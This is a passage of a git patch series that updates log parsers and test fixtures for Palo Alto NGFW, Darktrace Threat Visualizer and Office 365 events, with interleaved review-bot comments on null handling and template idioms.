"ip": "1.7.4.4" + }, + "log": { + "hostname": "FFFF01", + "level": "informational", + "logger": "system" + }, + "observer": { + "name": "FFFF01", + "product": "PAN-OS", + "serial_number": "024101011111" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "EventID": "auth-success", + "Threat_ContentType": "auth", + "authetification": { + "profile": "FFFF" + }, + "server": { + "profile": "server-test" + }, + "vsys": "shared" + }, + "related": { + "ip": [ + "1.2.2.7", + "1.7.4.4" + ], + "user": [ + "joe979" + ] + }, + "source": { + "address": "1.2.2.7", + "ip": "1.2.2.7" + }, + "user": { + "name": "joe979" + } + } +} \ No newline at end of file From 4d53a344d73bccb51f2aa191ce2909ce32fbdb66 Mon Sep 17 00:00:00 2001 
From: TOUFIKI Zakarya Date: Wed, 6 Nov 2024 15:38:10 +0100 Subject: [PATCH 202/317] Apply linter --- .../paloalto-ngfw/_meta/fields.yml | 20 +++++++++---------- .../tests/test_event_reason.json | 4 ++-- .../tests/test_event_reason1.json | 4 ++-- .../tests/test_event_reason2.json | 4 ++-- .../tests/test_event_reason3.json | 4 ++-- 5 files changed, 18 insertions(+), 18 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index 3f149e4a5..e42125a42 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -258,6 +258,11 @@ paloalto.authentication.method: name: paloalto.authentication.method type: keyword +paloalto.authetification.profile: + description: The authentication profile + name: paloalto.authetification.profile + type: keyword + paloalto.connection.method: description: Identifies how the GlobalProtect app connected to the the Gateway name: paloalto.connection.method @@ -278,6 +283,11 @@ paloalto.endpoint.serial_number: name: paloalto.endpoint.serial_number type: keyword +paloalto.server.profile: + description: The server profile + name: paloalto.server.profile + type: keyword + paloalto.source.private.ip: description: Private IP address name: paloalto.source.private.ip @@ -312,13 +322,3 @@ paloalto.vsys: description: The virtual system name: paloalto.vsys type: keyword - -paloalto.authetification.profile: - description: The authentication profile - name: paloalto.authetification.profile - type: keyword - -paloalto.server.profile: - description: The server profile - name: paloalto.server.profile - type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json index d0c6195a9..dda76e854 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00", "sekoiaio": { "intake": { "dialect": "Palo Alto NGFW", "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" } - }, - "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00" + } }, "expected": { "message": "1,2024/10/25 16:04:52,024101011111,SYSTEM,userid,2522,2024/10/25 16:04:52,,connect-server-monitor-failure,,0,0,general,high,\"User-ID server monitor test05(vsystest) Access denied\",7389706522298800000,0x0,0,0,0,0,,FFFFF01,0,0,2024-10-25T16:04:52.574+02:00", diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json index 105b28d45..477b06aa6 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason1.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00", "sekoiaio": { "intake": { "dialect": "Palo Alto NGFW", "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" } - }, - "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00" + } }, "expected": { "message": "1,2024/10/25 16:10:48,024101010000,SYSTEM,userid,2562,2024/10/25 16:10:48,,connect-ldap-sever,1.2.3.4,0,0,general,informational,\"ldap cfg joe_done connected to server 5.6.7.8:333, initiated by: 0.0.1.1\",73897065222988700000,0x0,0,0,0,0,,FFFFFF01,0,0,2024-10-25T16:10:48.575+02:00", diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json index 65221596d..4fb229b1d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason2.json 
@@ -1,12 +1,12 @@
 {
 "input": {
+ "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0",
 "sekoiaio": {
 "intake": {
 "dialect": "Palo Alto NGFW",
 "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
 }
- },
- "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0"
+ }
 },
 "expected": {
 "message": "1,2024/10/22 08:54:16,024101011111,SYSTEM,auth,2511,2024/10/22 08:54:17,,auth-success,FFFF,0,0,general,informational,\"When authenticating user joe1595 from 1.2.3.4, a less secure authentication method PAP is used. Please migrate to PEAP or EAP-TTLS. Authentication Profile FFFF, vsys shared, Server Profile SERVER_TEST, Server Address 5.6.7.8\",7389706522298800000,0x0,0,0,0,0,,FWPAN01,0,0,2024-10-22T08:54:17.012+02:0",
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json
index 8f64d342d..6c18a16dc 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_event_reason3.json
@@ -1,12 +1,12 @@
 {
 "input": {
+ "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979. auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00",
 "sekoiaio": {
 "intake": {
 "dialect": "Palo Alto NGFW",
 "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
 }
- },
- "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979. auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00"
+ }
 },
 "expected": {
 "message": "1,2024/10/22 09:29:30,024101011111,SYSTEM,auth,2562,2024/10/22 09:29:30,,auth-success,FFFF,0,0,general,informational,\"authenticated for user joe979. auth profile FFFF, vsys shared, server profile server-test, server address 1.7.4.4, auth protocol PAP, admin role superuser, From: 1.2.2.7.\",738970652229833333,0x0,0,0,0,0,,FFFF01,0,0,2024-10-22T09:29:30.605+02:00",
From 972b3d9cdd6a4b021de129530d6b2c5fe698f216 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 6 Nov 2024 15:45:03 +0100 Subject: [PATCH 203/317] Apply prettier
---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index d09e6e308..2f8b22f2a 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
@@ -464,7 +464,7 @@ pipeline:
 AUTHENTICATION_CONSOLE: "authenticated for user '%{USERNAME:user}'. 
From: %{IP:src}."
 AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}"
 REASON1: 'User-ID server monitor %{HOSTNAME:hostname}\(%{WORD:vsys}\) %{GREEDYDATA:message}'
- REASON2: 'ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}'
+ REASON2: "ldap cfg %{WORD:config_name} connected to server %{IP:destination_ip}:%{INT:port}, initiated by: %{IP:source_ip}"
 REASON3: "When authenticating user %{WORD:user} from %{IP:source_ip}, a less secure authentication method %{WORD:auth_method} is used. Please migrate to %{WORD:recommended_methods1} or %{DATA:recommended_methods2}. Authentication Profile %{WORD:auth_profile}, vsys %{WORD:vsys}, Server Profile %{WORD:server_profile}, Server Address %{IP:destination_ip}"
 REASON4: "failed authentication for user %{WORD:user}. Reason: %{GREEDYDATA:reason} auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{WORD:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, From: %{IP:source_ip}"
 REASON5: 'authenticated for user %{WORD:user}\. auth profile %{WORD:auth_profile}, vsys %{WORD:vsys}, server profile %{DATA:server_profile}, server address %{IP:destination_ip}, auth protocol %{WORD:auth_protocol}, admin role %{WORD:admin_role}, From: %{IP:source_ip}\.'
From 7038066ee4cf2d2eccace8489e664b58a5e80e55 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 7 Nov 2024 10:53:40 +0200 Subject: [PATCH 204/317] Fix Darktrace parser
---
 .../ingest/parser.yml | 23 +++++- .../tests/test_aianalyst_2.json | 79 +++++++++++++++++++ .../test_aianalyst_without_log_type.json | 10 +-- 3 files changed, 101 insertions(+), 11 deletions(-) create mode 100644 Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json
diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
index f28c8ffae..4e77953a5 100644
--- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
+++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
@@ -19,6 +19,8 @@ pipeline:
 output_field: datetime
 format: "%Y-%m-%d %H:%M:%S"
 - name: set_common_fields
+ - name: set_breach_devices_fields
+ filter: "{{json_event.message.breachDevices | length > 0}}"
 - name: set_aianalyst_fields
 filter: "{{json_event.message.log_type == 'aianalyst/incidentevents' or json_event.message.aiaScore != null}}"
 - name: set_modelbreaches_fields
@@ -136,19 +138,32 @@ stages:
 {%- endif -%}
 {{filters}}

- set_aianalyst_fields:
+ set_breach_devices_fields:
 actions:
 - set:
 device.id: "{{json_event.message.breachDevices[0].did}}"
 event.action: "{{json_event.message.breachDevices[0].title}}"
- host.hostname: "{{json_event.message.breachDevices[0].hostname}}"
 host.id: "{{json_event.message.breachDevices[0].did}}"
 host.mac: "{{json_event.message.breachDevices[0].mac}}"
+
+ - set:
+ host.hostname: "{{json_event.message.breachDevices[0].hostname}}"
+ filter: '{{not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}'
+
+ - set:
 host.name: "{{json_event.message.breachDevices[0].identifier}}"
- filter: "{{json_event.message.breachDevices | length > 0}}"
+ filter: '{{not json_event.message.breachDevices[0].identifier.startswith("SaaS::")}}'
+
+ - set:
+ user.email: "{{json_event.message.breachDevices[0].hostname.split()[-1]}}"
+ filter: '{{json_event.message.breachDevices[0].hostname.startswith("SaaS::") and "@" in json_event.message.breachDevices[0].hostname.split()[-1]}}'
+
 - set:
 host.ip: "{{json_event.message.breachDevices[0].ip}}"
- filter: "{{json_event.message.breachDevices | length > 0 and (json_event.message.breachDevices[0].ip | is_ipaddress)}}"
+ filter: "{{json_event.message.breachDevices[0].ip | is_ipaddress}}"
+
+ set_aianalyst_fields:
+ actions:
 - set:
 event.kind: "alert"
 event.category: "threat"
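Review bot: The three new filters call `.startswith("SaaS::")` on `breachDevices[0].hostname` and `breachDevices[0].identifier` without guarding an absent or null value; the fixture added in this commit shows sibling fields of the same object (`ip`, `mac`, `subnet`) arriving as null, so a device with a null hostname would make the filter expression error instead of evaluating false, depending on how the engine treats attributes of None. A guard such as `filter: '{{json_event.message.breachDevices[0].hostname != None and not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}'` keeps the stage safe, and the `identifier` and `user.email` filters need the same treatment. The `user.email` set also relies on the last whitespace-separated token of a SaaS hostname being the account; a comment above it, `# SaaS devices are named "SaaS::<service>: <account>"; the last token is the account, kept only when it looks like an email`, records that assumption for the next maintainer. `set_aianalyst_fields` continues past the end of the hunk.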
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json
new file mode 100644
index 000000000..ebf8a69eb
--- /dev/null
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json
@@ -0,0 +1,79 @@ +{ + "input": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: 
john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}" + }, + "expected": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor 
john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 
1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}", + "event": { + "category": "threat", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-27T10:02:28.884000Z", + "darktrace": { + "threat_visualizer": { + "acknowledged": false, + "activityId": "da39a3ee", + "aiaScore": 93.67343783378601, + "attackPhases": [ + 3 + ], + "breachDevices": [ + { + "did": 3820, + "hostname": "SaaS::Zoom: john.doe@example.com", + "identifier": "SaaS::Zoom: john.doe@example.com", + "ip": null, + "mac": null, + "sid": -9, + "subnet": null + } + ], + "category": "critical", + "children": [ + "204a3642-a6f1-4ac3-85d0-add7dd0c9f9b" + ], + "currentGroup": "g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b", + "externalTriggered": false, + "groupCategory": "critical", + "groupScore": 21.063004966718992, + "groupingIds": [ + "3d2a2fc6" + ], + "mitreTactics": [ + "privilege-escalation" + ], + "periods": [ + { + "end": 1730023230000, + "start": 1730023230000 + } + ], + "relatedBreaches": [ + { + "modelName": "SaaS / Access / Unusual External Source for SaaS Credential Use", + "pbid": 46769, + "threatScore": 63.0, + "timestamp": 1730023232000 + } + ], + "userTriggered": false + } + }, + "device": { + "id": "3820" + }, + "host": { + "id": "3820" + }, + "observer": { + "name": "Darktrace", + "product": "Threat visualizer" + }, + "user": { + "email": "john.doe@example.com" + } + } +} \ No newline at end of file 
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
index 3ba5ae570..b64c616de 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json
@@ -66,18 +66,14 @@
 "id": "2635"
 },
 "host": {
- "hostname": "SaaS::AzureActiveDirectory: test@test.fr",
- "id": "2635",
- "name": "SaaS::AzureActiveDirectory: test@test.fr"
+ "id": "2635"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
 },
- "related": {
- "hosts": [
- "SaaS::AzureActiveDirectory: test@test.fr"
- ]
+ "user": {
+ "email": "test@test.fr"
 }
 }
 }
\ No newline at end of file
From 880d24a71d5a4d57880fca0044b6f5452506dfb9 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Thu, 7 Nov 2024 11:40:45 +0200 Subject: [PATCH 205/317] Fix empty host.ip
---
 .../ingest/parser.yml | 20 +++++++++---------- .../tests/test_anomalous_file.json | 6 +----- .../test_device_attack_and_recon_tools.json | 6 +----- .../test_device_request_watched_domain.json | 6 +----- 4 files changed, 12 insertions(+), 26 deletions(-)
diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
index 4e77953a5..92a2d9ef2 100644
--- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
+++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml
@@ -54,17 +54,15 @@ stages:
 observer.name: "Darktrace"
 observer.product: "Threat visualizer"
 host.ip: >
- {% if json_event.message.device.ips is not in [[], Null]%}
- [
- {% for ip in json_event.message.device.ips %}
- {% if ip.get("ip") %}
- {% if ip["ip"] | is_ipaddress %}
- '{{ip["ip"]}}',
- {% endif %}
- {% endif %}
- {% endfor %}
- ]
- {% endif %}
+ {%- set host_ips = [] -%}
+ {%- for ip in json_event.message.device.ips -%}
+ {%- if ip.get("ip") | is_ipaddress -%}
+ {%- set host_ips = host_ips.append(ip["ip"]) -%}
+ {%- endif -%}
+ {%- endfor -%}
+ {%- if host_ips | length > 0 -%}
+ {{ host_ips }}
+ {%- endif -%}

 set_modelbreaches_fields:
 actions:
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
index 781d6cce6..49512bdeb 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json
@@ -158,15 +158,11 @@
 }
 },
 "host": {
- "id": "16",
- "ip": []
+ "id": "16"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
- },
- "related": {
- "ip": []
 }
 }
 }
\ No newline at end of file
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
index 90d9307b3..5092ebe13 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_attack_and_recon_tools.json
@@ -118,15 +118,11 @@
 }
 },
 "host": {
- "id": "16",
- "ip": []
+ "id": "16"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
- },
- "related": {
- "ip": []
 }
 }
 }
\ No newline at end of file
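Review bot: `{%- set host_ips = host_ips.append(ip["ip"]) -%}` rebinds the loop-scoped name to the `None` that `list.append` returns; it only keeps collecting because the loop re-aliases the outer list on every iteration, and it reads like a bug to anyone who does not know that detail. The `{%- set _ = host_ips.append(ip["ip"]) -%}` form says what is meant and is the idiom used for the same purpose elsewhere in these parsers. The rewrite also drops the old `is not in [[], Null]` guard, so whether an event with no `device` or no `device.ips` still renders nothing rather than raising now depends on the engine's undefined handling; the aianalyst fixtures, which carry `breachDevices` but no `device`, are the place to confirm it. The enclosing stage (presumably `set_common_fields`) starts before the hunk.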
diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
index 9ae53b161..7866f9581 100644
--- a/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
+++ b/Darktrace/darktrace-threat-visualizer/tests/test_device_request_watched_domain.json
@@ -114,16 +114,12 @@
 }
 },
 "host": {
- "id": "6",
- "ip": []
+ "id": "6"
 },
 "observer": {
 "name": "Darktrace",
 "product": "Threat visualizer"
 },
- "related": {
- "ip": []
- },
 "service": {
 "name": "Slack"
 },
From 4d63741595f95d292e5454a4a5ce65b030613ae8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Thu, 7 Nov 2024 16:01:35 +0100 Subject: [PATCH 206/317] fix(o365): Parse ClientAppId in Exchange events
---
 Office 365/o365/ingest/parser.yml | 7 +++++++ Office 365/o365/tests/clientipadress.json | 5 +++++ Office 365/o365/tests/exchange_item_update.json | 5 +++++ Office 365/o365/tests/inbox_rule.json | 5 ++++- 4 files changed, 21 insertions(+), 1 deletion(-)
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml
index 62a4098df..13036065f 100644
--- a/Office 365/o365/ingest/parser.yml
+++ b/Office 365/o365/ingest/parser.yml
@@ -164,6 +164,10 @@ stages:
 filter: '{{json_event.message.get("Parameters") != None}}'
 - set:
 office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+ office365.context.client.id: "{{json_event.message.ClientAppId}}"
+ - set:
+ office365.context.client.id: "{{json_event.message.AppId}}"
+ filter: '{{json_event.message.get("ClientAppId") == ""}}'

 parse_exchange_item:
 actions:
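Review bot: The `AppId` fallback in the `@@ -164` hunk fires only when `ClientAppId` is present and equal to the empty string; when the key is missing from the record, `get("ClientAppId")` yields `None`, the filter is false and `office365.context.client.id` is left unset even though `AppId` may be available. Testing for null-or-empty, `filter: '{{json_event.message.get("ClientAppId") in [None, ""]}}'`, covers both cases and matches the `not in [None, ""]` form used in other parsers of this repository. A fixture with no `ClientAppId` key at all would pin the fallback. The enclosing stage begins before the hunk.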
@@ -189,6 +193,7 @@ stages:
 user.id: "{{json_event.message.LogonUserSid}}"
 office365.exchange.mailbox_guid: "{{json_event.message.MailboxGuid}}"
 office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+ office365.context.client.id: "{{json_event.message.ClientAppId}}"
 - set:
 email.subject: "{{json_event.message.Item.Subject}}"
 email.message_id: "{{json_event.message.Item.InternetMessageId[1:-1]}}"
@@ -237,6 +242,7 @@ stages:
 ]
 - set:
 office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+ office365.context.client.id: "{{json_event.message.ClientAppId}}"
 parse_share_point:
 actions:
 - set:
@@ -254,6 +260,7 @@ stages:
 actions:
 - set:
 office365.context.aad_session_id: "{{json_event.message.SessionId}}"
+ office365.context.client.id: "{{json_event.message.ClientAppId}}"

 parse_network_traffic:
 actions:
diff --git a/Office 365/o365/tests/clientipadress.json b/Office 365/o365/tests/clientipadress.json
index c20107759..6f5c9ac9d 100644
--- a/Office 365/o365/tests/clientipadress.json
+++ b/Office 365/o365/tests/clientipadress.json
@@ -23,6 +23,11 @@
 "target": "user"
 },
 "office365": {
+ "context": {
+ "client": {
+ "id": "clientappidxxxx-xxx-xxx-xxxx"
+ }
+ },
 "record_type": 50,
 "result_status": "Succeeded",
